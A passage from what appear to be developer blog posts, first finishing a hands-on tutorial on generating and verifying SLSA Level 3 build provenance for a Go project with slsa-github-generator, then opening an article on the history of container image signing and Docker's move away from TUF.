&lt;li&gt;which repo, owned by whom&lt;/li&gt;
&lt;li&gt;which GitHub Actions run id (this number is permanent)&lt;/li&gt;
&lt;li&gt;which OS image it ran on&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With this much retained, "did a binary born from tag v2.7.1 actually come out of a GitHub-hosted runner running the legitimate workflow?" is fully reconstructable after the fact.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 5: Look at &lt;code&gt;materials&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;materials&lt;/code&gt; is "the list of build inputs": source code and the builder environment, side by side.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;slsa-verifier-darwin-arm64.intoto.jsonl | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.payload'&lt;/span&gt; | &lt;span class="nb"&gt;base64&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="s1"&gt;'.predicate.materials'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"uri"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"git+https://github.com/slsa-framework/slsa-verifier@refs/tags/v2.7.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"sha1"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ea584f4502babc6f60d9bc799dbbb13c1caa9ee6"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"uri"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/actions/virtual-environments/releases/tag/ubuntu24/20250622.1.0"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Combine this with the SBOM and the chain "source → builder → artifact → internal components" becomes verifiable end to end.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. Issue SLSA L3 Provenance from your own repo
&lt;/h2&gt;

&lt;p&gt;Verification works. Now flip to the producer side: build a Go hello-world and bolt &lt;code&gt;slsa-github-generator&lt;/code&gt; onto it.&lt;/p&gt;

&lt;p&gt;The finished version lives at &lt;a href="https://github.com/0-draft/hello-slsa" rel="noopener noreferrer"&gt;&lt;code&gt;github.com/0-draft/hello-slsa&lt;/code&gt;&lt;/a&gt;. Type along by hand or &lt;code&gt;git clone&lt;/code&gt;, whichever you prefer.&lt;/p&gt;

&lt;h3&gt;
  
  
  Project layout
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;hello-slsa/
├── main.go
├── go.mod
├── .slsa-goreleaser.yml          # builder configuration
└── .github/
    └── workflows/
        └── release.yml            # release on tag push
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Minimal code
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;main.go&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;package&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;

&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="s"&gt;"fmt"&lt;/span&gt;
    &lt;span class="s"&gt;"runtime"&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="n"&gt;Version&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"0.1.0"&lt;/span&gt;

&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;fmt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"hello-slsa %s (%s/%s)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Version&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;runtime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GOOS&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;runtime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GOARCH&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;go.mod&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;module github.com/0-draft/hello-slsa

go 1.26
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;code&gt;.slsa-goreleaser.yml&lt;/code&gt;: the builder's configuration
&lt;/h3&gt;

&lt;p&gt;The slsa-github-generator Go builder reads a &lt;code&gt;goreleaser&lt;/code&gt;-compatible YAML. Nothing fancy.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;version&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;

&lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;GO111MODULE=on&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;CGO_ENABLED=0&lt;/span&gt;

&lt;span class="na"&gt;flags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-trimpath&lt;/span&gt;

&lt;span class="na"&gt;ldflags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-X&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;main.Version={{&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;.Env.VERSION&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;}}"&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-s&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;-w"&lt;/span&gt;

&lt;span class="na"&gt;goos&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;linux&lt;/span&gt;
&lt;span class="na"&gt;goarch&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;amd64&lt;/span&gt;

&lt;span class="na"&gt;binary&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hello-slsa-{{ .Os }}-{{ .Arch }}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;-trimpath&lt;/code&gt; and &lt;code&gt;CGO_ENABLED=0&lt;/code&gt; are reproducibility incantations. The next post on Reproducible Builds digs into why these matter.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;code&gt;.github/workflows/release.yml&lt;/code&gt;: the caller
&lt;/h3&gt;

&lt;p&gt;This is the heart of it. &lt;code&gt;uses:&lt;/code&gt; calls the slsa-github-generator reusable workflow.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Release with SLSA L3 Provenance&lt;/span&gt;

&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;push&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;v*"&lt;/span&gt;

&lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read-all&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;build&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;    &lt;span class="c1"&gt;# required to mint OIDC tokens&lt;/span&gt;
      &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;    &lt;span class="c1"&gt;# required to upload assets to the GitHub Release&lt;/span&gt;
      &lt;span class="na"&gt;actions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;      &lt;span class="c1"&gt;# required to read workflow run metadata&lt;/span&gt;
    &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;slsa-framework/slsa-github-generator/.github/workflows/builder_go_slsa3.yml@v2.1.0&lt;/span&gt;
    &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;go-version&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1.26"&lt;/span&gt;
      &lt;span class="na"&gt;config-file&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.slsa-goreleaser.yml&lt;/span&gt;
      &lt;span class="na"&gt;evaluated-envs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VERSION:${{&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;github.ref_name&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;}}"&lt;/span&gt;
      &lt;span class="na"&gt;upload-assets&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;

  &lt;span class="na"&gt;verify&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;needs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;build&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;slsa-framework/slsa-verifier/actions/installer@v2.7.1&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/download-artifact@v8&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ needs.build.outputs.go-binary-name }}&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/download-artifact@v8&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ needs.build.outputs.go-provenance-name }}&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;slsa-verifier verify-artifact \&lt;/span&gt;
            &lt;span class="s"&gt;"${{ needs.build.outputs.go-binary-name }}" \&lt;/span&gt;
            &lt;span class="s"&gt;--provenance-path "${{ needs.build.outputs.go-provenance-name }}" \&lt;/span&gt;
            &lt;span class="s"&gt;--source-uri "github.com/${{ github.repository }}" \&lt;/span&gt;
            &lt;span class="s"&gt;--source-tag "${{ github.ref_name }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;About the permissions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;id-token: write&lt;/code&gt;&lt;/strong&gt;: lets GitHub mint an OIDC ID token. That token is exchanged at Fulcio for a short-lived certificate, which signs the provenance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;contents: write&lt;/code&gt;&lt;/strong&gt;: needed when &lt;code&gt;upload-assets: true&lt;/code&gt; to upload Release assets.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;actions: read&lt;/code&gt;&lt;/strong&gt;: needed to read the workflow's own metadata (run id, sha, ref).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;What happens when this fires:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F30wohvqod71ge5njlknx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F30wohvqod71ge5njlknx.png" alt="Github Workflow" width="800" height="559"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;build&lt;/code&gt; job only compiles the user's code; it never participates in assembling or signing the provenance. Because &lt;code&gt;builder_go_slsa3.yml&lt;/code&gt; runs as a &lt;strong&gt;separate workflow&lt;/strong&gt;, no matter how dirty your user code is, it cannot reach the signing key. That's the L3 separation.&lt;/p&gt;

&lt;h3&gt;
  
  
  Local check
&lt;/h3&gt;

&lt;p&gt;Before pushing the tag, run the build locally to see it work.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/0-draft/hello-slsa
&lt;span class="nb"&gt;cd &lt;/span&gt;hello-slsa

go build &lt;span class="nt"&gt;-trimpath&lt;/span&gt; &lt;span class="nt"&gt;-ldflags&lt;/span&gt; &lt;span class="s2"&gt;"-s -w"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; hello-slsa &lt;span class="nb"&gt;.&lt;/span&gt;
./hello-slsa
&lt;span class="c"&gt;# hello-slsa 0.1.0 (darwin/arm64)&lt;/span&gt;

shasum &lt;span class="nt"&gt;-a&lt;/span&gt; 256 hello-slsa
&lt;span class="c"&gt;# 3258c85472175bdbfe0ef450402265ca118ed0c97a1ab4e8b96b5704e2f9a1d6  hello-slsa&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When the same build runs in CI, that SHA256 is what ends up in &lt;code&gt;subject.digest.sha256&lt;/code&gt; of the provenance, and &lt;code&gt;.intoto.jsonl&lt;/code&gt; is uploaded alongside the binary. The hash will differ across environments and toolchains; the point is that the value you computed locally matches the value in the provenance subject.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;[!NOTE]&lt;br&gt;
&lt;code&gt;id-token: write&lt;/code&gt; requires OIDC to be enabled on the repo. On github.com it is on by default. On GitHub Enterprise Server you have to configure it separately.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  3. What can the verifier actually trust?
&lt;/h2&gt;

&lt;p&gt;Provenance flows out the producer side. Back on the consumer side, what does &lt;code&gt;slsa-verifier verify-artifact&lt;/code&gt; actually confirm?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyvomhcgow66jod3j90gp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyvomhcgow66jod3j90gp.png" alt="Actually Trust" width="800" height="130"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What it can do&lt;/strong&gt;: cryptographically prove "the binary at tag v2.7.1 really did come out of the legitimate GitHub Actions builder." SUNSPOT-style attacks (tampering during the build) and Codecov-style attacks (uploading without going through the build) stop here.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What it cannot do&lt;/strong&gt;: if the source itself contains malicious changes, the provenance faithfully signs "we correctly took this malicious code as input." That needs a different layer: SLSA Source Track, four-eyes review, and so on.&lt;/p&gt;

&lt;p&gt;In other words, provenance is the layer that detects build-path tampering but cannot detect human malice. Combine it with SBOM (transparency about contents) and Cosign (identity of the author), and only then do you get layered defense.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Layering SBOM + Cosign + Provenance
&lt;/h2&gt;

&lt;p&gt;Final picture: lay all three side by side.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What it proves&lt;/th&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;predicateType&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Ingredients (contents)&lt;/td&gt;
&lt;td&gt;Syft + cosign attest&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://cyclonedx.org/bom&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Identity (author)&lt;/td&gt;
&lt;td&gt;cosign sign&lt;/td&gt;
&lt;td&gt;(the signature itself, not a Statement)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Build path&lt;/td&gt;
&lt;td&gt;slsa-github-generator&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://slsa.dev/provenance/v1&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr3luf33zccb66nlzno2h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr3luf33zccb66nlzno2h.png" alt="SBOM and Cosign and Provenance" width="800" height="230"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once "build path + contents + author" are all in place, the artifact has all-around evidence. If the Kubernetes admission layer can enforce &lt;code&gt;reject unless provenance, SBOM, and signature are all present&lt;/code&gt;, the operator's trust boundary firms up considerably.&lt;/p&gt;




&lt;h2&gt;
  
  
  Wrap-up
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What we did&lt;/th&gt;
&lt;th&gt;What we learned&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Verified a public artifact with &lt;code&gt;slsa-verifier&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;How to verify provenance without holding any keys&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mutated a single byte and watched verification fail&lt;/td&gt;
&lt;td&gt;The point at which SUNSPOT-style attacks die&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Opened &lt;code&gt;.intoto.jsonl&lt;/code&gt; with &lt;code&gt;jq&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;What is actually recorded inside the provenance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Wrote a &lt;code&gt;slsa-github-generator&lt;/code&gt; workflow&lt;/td&gt;
&lt;td&gt;The "way to call in" that satisfies L3&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Provenance, unlike SBOM or Cosign, isn't something you can produce locally with a one-shot CLI. &lt;strong&gt;The builder itself has to be running in a place you trust&lt;/strong&gt;, which is why something like a GitHub Actions reusable workflow (with its structural separation) is non-negotiable. The flip side: if you have that environment, a single line of &lt;code&gt;uses:&lt;/code&gt; carries you all the way to L3.&lt;/p&gt;

&lt;p&gt;The next post moves to the operational headache that always shows up once SBOMs hit production: &lt;strong&gt;"the vulnerability scanner threw 800 warnings, but only 5 are actually exploitable."&lt;/strong&gt; We pin that down with VEX. Where provenance is "authenticity of the build path", VEX is "authenticity of vulnerability triage."&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://github.com/0-draft/hello-slsa" rel="noopener noreferrer"&gt;0-draft/hello-slsa&lt;/a&gt; (the hands-on repo for this article)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/slsa-framework/slsa-github-generator" rel="noopener noreferrer"&gt;slsa-framework/slsa-github-generator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/slsa-framework/slsa-verifier" rel="noopener noreferrer"&gt;slsa-framework/slsa-verifier&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://slsa.dev/spec/v1.0/provenance" rel="noopener noreferrer"&gt;SLSA v1.0 Provenance spec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/in-toto/attestation" rel="noopener noreferrer"&gt;in-toto Attestation Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/secure-systems-lab/dsse" rel="noopener noreferrer"&gt;DSSE (Dead Simple Signing Envelope)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>supplychain</category>
      <category>slsa</category>
      <category>sigstore</category>
    </item>
    <item>
      <title>Why Did Docker Abandon TUF?: A Turbulent History of Container Signing</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Tue, 28 Apr 2026 11:34:24 +0000</pubDate>
      <link>https://dev.to/kanywst/why-did-docker-abandon-tuf-a-turbulent-history-of-container-signing-29i4</link>
      <guid>https://dev.to/kanywst/why-did-docker-abandon-tuf-a-turbulent-history-of-container-signing-29i4</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;While doing a deep dive on Sigstore and TUF, a question hit me out of nowhere.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;"OK, but how exactly are container images protected from tampering?"&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you understand TUF, you'd guess: "You write the container image hash into &lt;code&gt;targets.json&lt;/code&gt;, sign it with an offline key, done." And in 2015, that's exactly how it worked.&lt;/p&gt;

&lt;p&gt;But today, that mental model is &lt;strong&gt;completely outdated&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The container signing architecture in the Docker world has gone through a turbulent decade: &lt;strong&gt;"They tried to do it the TUF way, developers refused to play along, the whole thing imploded, and the industry pivoted to a totally different approach."&lt;/strong&gt; And that "different approach" turned out to be &lt;strong&gt;two competing approaches&lt;/strong&gt; released around the same time, both fighting for dominance. Trying to keep up with this is exhausting.&lt;/p&gt;




&lt;h2&gt;
  
  
  Background: What "Signing a Container Image" Actually Means
&lt;/h2&gt;

&lt;p&gt;Before diving into history, we need to nail down what "signing a container image" actually does. If this is fuzzy, the rest of the story will be too.&lt;/p&gt;

&lt;h3&gt;
  
  
  Structure of a Container Image
&lt;/h3&gt;

&lt;p&gt;A container image is not just a tar file. A JSON file called the &lt;strong&gt;Manifest&lt;/strong&gt; holds the &lt;strong&gt;hashes (digests)&lt;/strong&gt; of each layer (filesystem diff) and config file that make up the image.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌───────────────────────────────────────┐
│  Image Manifest (JSON)                │
│                                       │
│   config:  sha256:abc123...           │
│   layers:                             │
│     - sha256:def456... (base OS)      │
│     - sha256:789ghi... (app code)     │
│                                       │
│  ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─│
│  Manifest's own Digest:               │
│    sha256:xxxxxx...                   │
│  → This is the "image fingerprint"    │
└───────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If even 1 bit of the image content changes, the Manifest's Digest changes completely. &lt;strong&gt;If we can guarantee just this Digest is correct, we can detect any tampering of the entire image.&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  "Signing" = Detached signature on the Digest
&lt;/h3&gt;

&lt;p&gt;The intuitive idea is "embed the signature data inside the image," but that's impossible. If you change the image to insert a signature, the Digest changes, and the signature becomes invalid. Chicken-and-egg problem.&lt;/p&gt;

&lt;p&gt;So container signatures are always &lt;strong&gt;Detached Signatures&lt;/strong&gt;. Sign the Manifest's Digest from outside, and store the signature &lt;strong&gt;somewhere separate&lt;/strong&gt; from the image itself.&lt;/p&gt;

&lt;p&gt;So where is "somewhere separate"? &lt;strong&gt;This is the question that has been violently re-litigated for ten years.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Timeline: A Decade of Container Signing
&lt;/h2&gt;

&lt;p&gt;Let's lay out the full picture first. Each entry will be expanded in later sections.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2015.08&lt;/strong&gt;&lt;/td&gt;
